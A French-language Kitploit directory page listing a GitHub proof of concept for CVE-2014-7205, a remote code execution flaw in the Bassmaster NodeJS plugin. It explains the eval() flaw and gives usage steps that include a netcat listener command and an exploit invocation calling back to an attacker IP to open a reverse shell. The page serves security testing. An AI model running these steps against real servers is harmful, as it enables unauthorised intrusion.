Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2014-7205 — Plugin Bassmaster NodeJS RCE | Kitploit
Outils/GitHubGitHub/andrewtrube/cve-2014-7205
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionGénération de Shellcode
GitHubandrewtrube/cve-2014-7205

CVE-2014-7205

Plugin Bassmaster NodeJS RCE

Voir le dépôt
3il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Bassmaster NodeJS Plugin RCE PoC

bassmaster-rce.py: Un script Python pour exploiter CVE-2014-7205. nodeshell.py: Un module Python pour générer un reverse shell pour NodeJS

!!Utilisez uniquement contre des serveurs sur lesquels vous avez la permission de tester

Résumé

CVE-2014-7205 est une vulnérabilité d'exécution de code à distance dans le plugin Bassmaster pour NodeJS. Toutes les versions <= 1.5.1 sont concernées. La vulnérabilité existe dans le fichier lib/batch.js dans la fonction internals.batch où un appel à eval() utilise une entrée utilisateur mal échappée (en gros, l'expression régulière ne vérifie pas si les requêtes contiennent du code malveillant).

Preuve de concept

  1. Téléchargez ou clonez le dépôt git
  2. Ouvrez un écouteur netcat dans un terminal bash nc -lvp 4444
  3. Assurez-vous que bassmaster-rce.py et nodeshell.py sont dans le même dossier
  4. Exécutez bassmaster-rce.py python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444

Autre

  • nodeshell.py est entièrement portable vers d'autres PoCs et exploits utilisant python qui ont également besoin de générer un reverse shell pour NodeJS
Télécharger l’outil